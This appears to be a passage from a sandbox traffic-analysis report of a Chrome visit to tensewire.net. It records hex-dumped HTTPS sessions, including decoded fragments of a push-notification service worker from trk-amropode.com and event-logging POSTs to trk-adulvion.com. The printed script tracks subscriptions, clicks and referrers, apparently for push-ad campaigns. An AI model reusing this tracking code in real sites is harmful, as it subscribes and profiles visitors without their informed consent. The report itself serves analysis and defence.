                              Data Ascii: ion(a,b,c){if(Array.prototype.name="Array",Object.prototype.name="Object",a.constructor!==Response&&a.constructor!==Array&&"defineProperty"!==b&&"forEach"!==b&&"push"!==b&&"status"!==b&&"Array"!==a.name&&"Response"!==a.name&&"log"!==b)return"writable"in c
                              2024-04-25 18:22:17 UTC1369INData Raw: 74 20 66 3d 7b 74 69 74 6c 65 3a 63 2e 74 69 74 6c 65 2c 62 6f 64 79 3a 63 2e 6d 65 73 73 61 67 65 2c 74 61 67 3a 63 2e 74 61 67 2c 72 65 6e 6f 74 69 66 79 3a 63 2e 72 65 6e 6f 74 69 66 79 2c 69 63 6f 6e 3a 63 2e 69 63 6f 6e 2c 62 61 64 67 65 3a 63 2e 62 61 64 67 65 2c 72 65 71 75 69 72 65 49 6e 74 65 72 61 63 74 69 6f 6e 3a 21 30 2c 61 63 74 69 6f 6e 73 3a 64 2c 64 61 74 61 3a 7b 75 72 6c 3a 63 2e 72 65 64 69 72 65 63 74 2c 57 6a 6f 56 3a 21 30 2c 63 49 64 3a 63 2e 63 61 6d 70 61 69 67 6e 49 64 2c 70 73 49 64 3a 63 2e 70 75 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 2c 61 70 69 49 64 3a 63 2e 61 70 69 49 64 2c 70 69 78 65 6c 73 3a 63 2e 70 69 78 65 6c 73 2c 70 69 78 65 6c 56 61 6c 75 65 73 3a 63 2e 70 69 78 65 6c 56 61 6c 75 65 73 2c 72 65 74 75 72
                              Data Ascii: t f={title:c.title,body:c.message,tag:c.tag,renotify:c.renotify,icon:c.icon,badge:c.badge,requireInteraction:!0,actions:d,data:{url:c.redirect,WjoV:!0,cId:c.campaignId,psId:c.pushSubscriptionId,apiId:c.apiId,pixels:c.pixels,pixelValues:c.pixelValues,retur
                              2024-04-25 18:22:17 UTC1180INData Raw: 73 2d 61 70 69 2f 65 78 74 2d 64 61 74 61 2f 22 2b 22 32 39 37 38 38 63 61 39 37 36 31 61 34 62 37 38 61 62 63 66 62 31 63 33 65 61 62 62 38 65 36 38 22 2c 7b 6d 65 74 68 6f 64 3a 22 70 6f 73 74 22 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 72 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 28 61 2c 72 2e 75 74 6d 48 61 73 68 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 63 28 61 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 28 61 29 2c 69 28 22 65 78 74 5f 65 72 72 6f 72 5f 66 65 74 63 68 69 6e 67 5f 70 75 73 68 22 2c
                              Data Ascii: s-api/ext-data/"+"29788ca9761a4b78abcfb1c3eabb8e68",{method:"post",headers:{"Content-type":"application/json"},body:JSON.stringify(r)}).then(function(a){return d(a,r.utmHash)}).then(function(a){a&&c(a)}).catch(function(a){c(a),i("ext_error_fetching_push",
                              2024-04-25 18:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.449781104.21.22.1404435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:18 UTC431OUTGET //scripts/sw/v9e118mez8 HTTP/1.1
                              Host: trk-amropode.com
                              Connection: keep-alive
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:18 UTC1344INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:18 GMT
                              Content-Type: application/javascript;charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: 0
                              Cache-Control: max-age=14400, must-revalidate
                              x-xss-protection: 1; mode=block
                              pragma: no-cache
                              x-frame-options: SAMEORIGIN
                              referrer-policy: strict-origin-when-cross-origin
                              content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                              vary: Origin
                              vary: Access-Control-Request-Method
                              vary: Access-Control-Request-Headers
                              x-content-type-options: nosniff
                              permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                              CF-Cache-Status: HIT
                              Age: 5567
                              Last-Modified: Thu, 25 Apr 2024 16:49:31 GMT
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FjxoRIiRaygafshAJA3vo5Tvp2KAFbSuUG4xdx%2BM2vMOjpMlQMGGNb4hUQd7A4%2BK6%2BmA%2FE%2BueEkb%2FI1pzfl4Kj8UbxMm9Xo7iZss7QVvJa3lWcZIySL8YZf5LYCVamyuuDsY"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              2024-04-25 18:22:18 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 37 61 30 35 62 39 33 64 61 35 35 37 38 63 65 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                              Data Ascii: CF-RAY: 87a05b93da5578ce-ATLalt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:18 UTC1369INData Raw: 32 64 61 64 0d 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 63 6f 6e 73 74 20 65 6e 76 3d 7b 6c 6f 67 3a 21 30 2c 72 65 74 72 79 3a 31 30 2c 73 6c 65 65 70 54 69 6d 65 3a 31 65 34 2c 64 6f 6d 61 69 6e 3a 22 70 75 73 68 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 22 2c 6e 6f 74 69 66 69 63 61 74 69 6f 6e 44 6f 6d 61 69 6e 3a 22 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 22 2c 73 75 62 73 63 72 69 70 74 69 6f 6e 44 6f 6d 61 69 6e 3a 22 73 75 62 73 63 72 69 70 74 69 6f 6e 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 22 2c 65 76 65 6e 74 44 6f 6d 61 69 6e 3a 22 65 76 65 6e 74 2e 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 22 7d 2c 61 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 50 75 62 6c 69 63 4b
                              Data Ascii: 2dad'use strict';const env={log:!0,retry:10,sleepTime:1e4,domain:"push.trk-amropode.com",notificationDomain:"notification.trk-amropode.com",subscriptionDomain:"subscription.trk-amropode.com",eventDomain:"event.trk-amropode.com"},applicationServerPublicK
                              2024-04-25 18:22:18 UTC1369INData Raw: 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 74 72 79 7b 62 3d 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 61 29 7b 7d 7d 2c 65 2e 67 65 74 28 22 73 65 67 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29 74 72 79 7b 63 3d 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 61 29 7b 7d 7d 2c 65 2e 67 65 74 28 22 73 65 73 73 69 6f 6e 49 64 73 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 29
                              Data Ascii: shSubscriptionId").onsuccess=function(a){if(a.target.result)try{b=a.target.result.value}catch(a){}},e.get("seg").onsuccess=function(a){if(a.target.result)try{c=a.target.result.value}catch(a){}},e.get("sessionIds").onsuccess=function(a){if(a.target.result)
                              2024-04-25 18:22:18 UTC1369INData Raw: 43 6c 69 63 6b 44 61 74 61 49 6e 53 74 6f 72 65 28 61 2c 62 29 7b 76 61 72 20 63 3d 67 65 74 48 6f 75 72 42 79 54 69 6d 65 5a 6f 6e 65 28 29 2c 64 3d 7b 6e 61 6d 65 3a 22 70 75 73 68 41 70 69 49 64 73 22 7d 3b 62 5b 30 5d 2e 63 6c 69 63 6b 55 6e 69 78 44 61 74 65 3d 63 2e 75 6e 69 78 2c 64 2e 76 61 6c 75 65 3d 62 3b 74 72 79 7b 61 2e 67 65 74 28 22 70 75 73 68 41 70 69 49 64 73 22 29 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 3d 3d 6e 75 6c 6c 3f 61 2e 70 75 74 28 64 29 3a 28 62 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 3d 3d 6e 75 6c 6c 26 26 28 62 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74 2e 76 61 6c 75 65 3d 5b 5d 29 2c 62 2e 74 61 72 67 65 74 2e 72 65 73 75 6c 74
                              Data Ascii: ClickDataInStore(a,b){var c=getHourByTimeZone(),d={name:"pushApiIds"};b[0].clickUnixDate=c.unix,d.value=b;try{a.get("pushApiIds").onsuccess=function(b){b.target.result==null?a.put(d):(b.target.result.value==null&&(b.target.result.value=[]),b.target.result
                              2024-04-25 18:22:18 UTC1369INData Raw: 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 62 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 6f 6b 29 7b 6c 65 74 20 62 3d 61 2e 6a 73 6f 6e 28 29 3b 72 65 74 75 72 6e 20 62 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 6d 50 75 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 3d 61 2e 69 64 2c 67 65 74 53 74 6f 72 65 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 7b 6e 61 6d 65 3a 22 70 75 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 22 7d 3b 62 2e 76 61 6c 75 65 3d 73 6d 50 75 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 2c 73 6d 50 75 73 68 53 75 62 73 63 72 69 70 74 69 6f 6e 49 64 26 26 61 2e 70 75 74 28 62 29 7d 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63
                              Data Ascii: "},body:JSON.stringify(b)}).then(function(a){if(a.ok){let b=a.json();return b}}).then(function(a){smPushSubscriptionId=a.id,getStore(function(a){const b={name:"pushSubscriptionId"};b.value=smPushSubscriptionId,smPushSubscriptionId&&a.put(b)})}).catch(func
                              2024-04-25 18:22:18 UTC1369INData Raw: 6e 2c 6a 2e 70 75 73 68 53 69 74 65 49 64 3d 73 69 74 65 49 64 2c 6a 2e 61 70 69 4b 65 79 3d 73 6d 41 50 49 4b 65 79 2c 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 22 2b 65 6e 76 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 44 6f 6d 61 69 6e 2b 22 2f 74 72 61 63 6b 69 6e 67 2f 67 65 74 6e 6f 74 69 66 69 63 61 74 69 6f 6e 22 2c 7b 6d 65 74 68 6f 64 3a 22 70 6f 73 74 22 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6a 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 69 66 28 32 30 30 3d 3d 3d 62 2e 73 74 61 74 75 73 29 7b 6c 65 74 20 63 3d 62 2e 6a 73 6f 6e 28 29 3b 72 65 74 75 72 6e 20 65 6e 76 2e 6c
                              Data Ascii: n,j.pushSiteId=siteId,j.apiKey=smAPIKey,fetch("https://"+env.notificationDomain+"/tracking/getnotification",{method:"post",headers:{"Content-type":"application/json"},body:JSON.stringify(j)}).then(function(b){if(200===b.status){let c=b.json();return env.l
                              2024-04-25 18:22:18 UTC1369INData Raw: 74 63 68 28 61 3d 3e 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 61 2e 6d 65 73 73 61 67 65 29 2c 6c 6f 67 53 57 45 76 65 6e 74 28 22 65 72 72 6f 72 5f 66 65 74 63 68 69 6e 67 5f 70 69 78 65 6c 22 2c 61 2c 76 65 72 73 69 6f 6e 29 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 4e 6f 74 69 66 69 63 61 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 74 69 74 6c 65 21 3d 3d 76 6f 69 64 20 30 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 61 2e 74 69 74 6c 65 26 26 22 41 75 74 6f 22 21 3d 61 2e 6d 65 73 73 61 67 65 26 26 22 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 22 21 3d 61 2e 74 69 74 6c 65 26 26 21 61 2e 73 74 61 74 75 73 29 7b 63 6f 6e 73 74 20 63 3d 61 2e 74 69 74 6c 65 2c 64 3d 61 72 72 61 79 52 6f 74 61 74 65 28 61 2e 61 63 74
                              Data Ascii: tch(a=>{console.error(a.message),logSWEvent("error_fetching_pixel",a,version)})}}function sendNotification(a,b){if(a.title!==void 0&&"undefined"!==a.title&&"Auto"!=a.message&&"Internal Server Error"!=a.title&&!a.status){const c=a.title,d=arrayRotate(a.act
                              2024-04-25 18:22:18 UTC1369INData Raw: 2e 64 61 74 61 2e 75 72 6c 3b 61 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 64 61 74 61 2e 72 65 74 75 72 6e 2e 70 75 73 68 41 70 69 49 64 73 26 26 73 65 74 43 6c 69 63 6b 44 61 74 61 28 61 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 64 61 74 61 2e 72 65 74 75 72 6e 2e 70 75 73 68 41 70 69 49 64 73 29 2c 61 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 63 6c 6f 73 65 28 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 26 26 62 2e 73 74 61 72 74 73 57 69 74 68 28 22 68 74 74 70 22 29 26 26 61 2e 77 61 69 74 55 6e 74 69 6c 28 63 6c 69 65 6e 74 73 2e 6d 61 74 63 68 41 6c 6c 28 7b 74 79 70 65 3a 22 77 69 6e 64 6f 77 22 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 63 6c 69 65 6e 74 73 2e 6f 70 65 6e 57 69 6e 64 6f 77 29 72 65
                              Data Ascii: .data.url;a.notification.data.return.pushApiIds&&setClickData(a.notification.data.return.pushApiIds),a.notification.close(),"undefined"!=typeof b&&b.startsWith("http")&&a.waitUntil(clients.matchAll({type:"window"}).then(function(){if(clients.openWindow)re
                              2024-04-25 18:22:18 UTC1369INData Raw: 65 22 2c 41 4d 50 5f 53 55 42 53 43 52 49 42 45 3a 22 61 6d 70 2d 77 65 62 2d 70 75 73 68 2d 73 75 62 73 63 72 69 62 65 22 2c 41 4d 50 5f 55 4e 53 55 42 53 43 52 49 42 45 3a 22 61 6d 70 2d 77 65 62 2d 70 75 73 68 2d 75 6e 73 75 62 73 63 72 69 62 65 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 48 6f 75 72 42 79 54 69 6d 65 5a 6f 6e 65 28 29 7b 76 61 72 20 61 3d 6e 65 77 20 44 61 74 65 28 29 2e 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 28 22 65 6e 2d 55 53 22 2c 7b 74 69 6d 65 5a 6f 6e 65 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 68 6f 75 72 31 32 3a 21 31 7d 29 2c 62 3d 6e 65 77 20 44 61 74 65 28 61 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 7b 64 61 74 65 3a 62 2c 75 6e 69 78 3a 44 61 74 65 2e 70 61 72 73 65 28 62 29
                              Data Ascii: e",AMP_SUBSCRIBE:"amp-web-push-subscribe",AMP_UNSUBSCRIBE:"amp-web-push-unsubscribe"};function getHourByTimeZone(){var a=new Date().toLocaleString("en-US",{timeZone:"America/Chicago",hour12:!1}),b=new Date(a).toISOString();return{date:b,unix:Date.parse(b)
                              2024-04-25 18:22:18 UTC749INData Raw: 63 74 69 6f 6e 20 62 72 6f 61 64 63 61 73 74 52 65 70 6c 79 28 61 2c 62 29 7b 73 65 6c 66 2e 63 6c 69 65 6e 74 73 2e 6d 61 74 63 68 41 6c 6c 28 29 2e 74 68 65 6e 28 63 3d 3e 7b 66 6f 72 28 6c 65 74 20 64 3d 30 3b 64 3c 63 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 63 6f 6e 73 74 20 65 3d 63 5b 64 5d 3b 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 63 6f 6d 6d 61 6e 64 3a 61 2c 70 61 79 6c 6f 61 64 3a 62 7d 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 6c 42 61 73 65 36 34 54 6f 55 69 6e 74 38 41 72 72 61 79 28 61 29 7b 63 6f 6e 73 74 20 62 3d 22 3d 22 2e 72 65 70 65 61 74 28 28 34 2d 61 2e 6c 65 6e 67 74 68 25 34 29 25 34 29 2c 63 3d 28 61 2b 62 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2f 22 29
                              Data Ascii: ction broadcastReply(a,b){self.clients.matchAll().then(c=>{for(let d=0;d<c.length;d++){const e=c[d];e.postMessage({command:a,payload:b})}})}function urlBase64ToUint8Array(a){const b="=".repeat((4-a.length%4)%4),c=(a+b).replace(/\-/g,"+").replace(/_/g,"/")


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.449783104.21.80.1044435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:18 UTC532OUTOPTIONS /register/event_log/v9e118mez8 HTTP/1.1
                              Host: event.trk-adulvion.com
                              Connection: keep-alive
                              Accept: */*
                              Access-Control-Request-Method: POST
                              Access-Control-Request-Headers: content-type
                              Origin: https://tensewire.net
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Dest: empty
                              Referer: https://tensewire.net/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:19 UTC1182INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:18 GMT
                              Content-Length: 0
                              Connection: close
                              expires: 0
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              access-control-allow-headers: content-type
                              x-xss-protection: 1; mode=block
                              pragma: no-cache
                              referrer-policy: strict-origin-when-cross-origin
                              content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                              access-control-allow-methods: POST
                              x-frame-options: SAMEORIGIN
                              access-control-expose-headers: Authorization, Link, X-Total-Count, X-pushPlatformApp-alert, X-pushPlatformApp-error, X-pushPlatformApp-params
                              access-control-allow-origin: *
                              vary: Origin
                              vary: Access-Control-Request-Method
                              vary: Access-Control-Request-Headers
                              x-content-type-options: nosniff
                              permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                              access-control-max-age: 1800
                              CF-Cache-Status: DYNAMIC
                              2024-04-25 18:22:19 UTC417INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 57 4f 5a 79 6f 38 52 25 32 42 4e 44 56 61 25 32 46 78 38 43 57 72 41 53 41 77 6d 78 67 4a 31 71 6d 34 7a 6e 37 74 30 59 79 6e 78 69 42 65 4e 77 58 38 50 73 6c 4b 73 35 41 70 6f 55 67 6c 6c 42 32 72 48 48 25 32 42 64 41 70 6c 67 38 54 37 76 48 38 38 45 35 35 48 64 41 61 4a 43 53 4f 56 61 75 34 64 42 25 32 46 68 46 30 64 65 64 51 36 39 36 6a 73 57 69 77 63 38 4f 67 61 74 32 4d 54 61 4f 56 65 45 6a 44 51 42 6a 25 32 46 61 46 6a 30 49 48 6e 4c 75 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOZyo8R%2BNDVa%2Fx8CWrASAwmxgJ1qm4zn7t0YynxiBeNwX8PslKs5ApoUgllB2rHH%2BdAplg8T7vH88E55HdAaJCSOVau4dB%2FhF0dedQ696jsWiwc8Ogat2MTaOVeEjDQBj%2FaFj0IHnLuD"}],"group":"cf-nel","max_a


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.449784104.21.80.1044435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:19 UTC629OUTPOST /register/event_log/v9e118mez8 HTTP/1.1
                              Host: event.trk-adulvion.com
                              Connection: keep-alive
                              Content-Length: 200
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-platform: "Windows"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Content-type: application/json
                              Accept: */*
                              Origin: https://tensewire.net
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://tensewire.net/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:19 UTC200OUTData Raw: 7b 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 75 74 6d 53 6f 75 72 63 65 22 3a 22 31 31 37 34 30 30 39 38 34 33 22 2c 22 73 6f 75 72 63 65 4f 6e 65 22 3a 22 64 47 56 75 63 32 56 33 61 58 4a 6c 4c 6d 35 6c 64 41 3d 3d 22 2c 22 73 6f 75 72 63 65 54 77 6f 22 3a 22 33 35 30 33 35 39 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 38 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 5c 22 73 75 62 73 63 72 69 62 65 5f 70 72 6f 6d 70 74 5c 22 22 2c 22 65 76 65 6e 74 22 3a 22 70 5f 73 75 62 73 63 72 69 62 65 5f 70 72 6f 6d 70 74 22 7d
                              Data Ascii: {"timezone":"Europe/Zurich","utmSource":"1174009843","sourceOne":"dGVuc2V3aXJlLm5ldA==","sourceTwo":"350359","sessionId":"","version":817,"message":"\"subscribe_prompt\"","event":"p_subscribe_prompt"}
                              2024-04-25 18:22:19 UTC1167INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:19 GMT
                              Content-Length: 0
                              Connection: close
                              expires: 0
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              x-xss-protection: 1; mode=block
                              pragma: no-cache
                              referrer-policy: strict-origin-when-cross-origin
                              x-pushplatformapp-params:
                              content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                              x-pushplatformapp-alert: pushPlatformApp.pushSubscription.deleted
                              x-frame-options: SAMEORIGIN
                              access-control-expose-headers: Authorization, Link, X-Total-Count, X-pushPlatformApp-alert, X-pushPlatformApp-error, X-pushPlatformApp-params
                              access-control-allow-origin: *
                              vary: Origin
                              vary: Access-Control-Request-Method
                              vary: Access-Control-Request-Headers
                              x-content-type-options: nosniff
                              permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                              CF-Cache-Status: DYNAMIC
                              2024-04-25 18:22:19 UTC407INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 31 39 42 6c 63 68 4b 53 6a 6d 70 63 6a 41 4c 4e 48 38 44 6c 6d 73 6a 62 35 6e 4b 57 49 6c 5a 69 5a 4d 4f 43 65 52 6b 78 69 42 38 58 76 76 6c 6b 76 7a 38 75 61 74 56 75 42 71 46 67 58 44 47 45 46 62 6a 78 6e 34 61 7a 38 6d 64 7a 4b 67 4b 64 66 46 57 72 41 55 5a 44 36 67 34 66 65 57 67 4c 4b 4b 76 33 37 66 39 50 69 70 67 58 57 32 54 33 77 52 74 66 78 32 63 58 47 34 62 35 6e 73 41 77 37 57 31 6f 75 77 6f 45 6f 30 43 7a 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19BlchKSjmpcjALNH8Dlmsjb5nKWIlZiZMOCeRkxiB8Xvvlkvz8uatVuBqFgXDGEFbjxn4az8mdzKgKdfFWrAUZD6g4feWgLKKv37f9PipgXW2T3wRtfx2cXG4b5nsAw7W1ouwoEo0Cz"}],"group":"cf-nel","max_age":604800


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.449786104.21.80.1044435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:20 UTC375OUTGET /register/event_log/v9e118mez8 HTTP/1.1
                              Host: event.trk-adulvion.com
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-04-25 18:22:20 UTC1359INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:20 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: 0
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              x-xss-protection: 1; mode=block
                              pragma: no-cache
                              referrer-policy: strict-origin-when-cross-origin
                              content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                              content-language: en-US
                              x-frame-options: SAMEORIGIN
                              vary: Origin
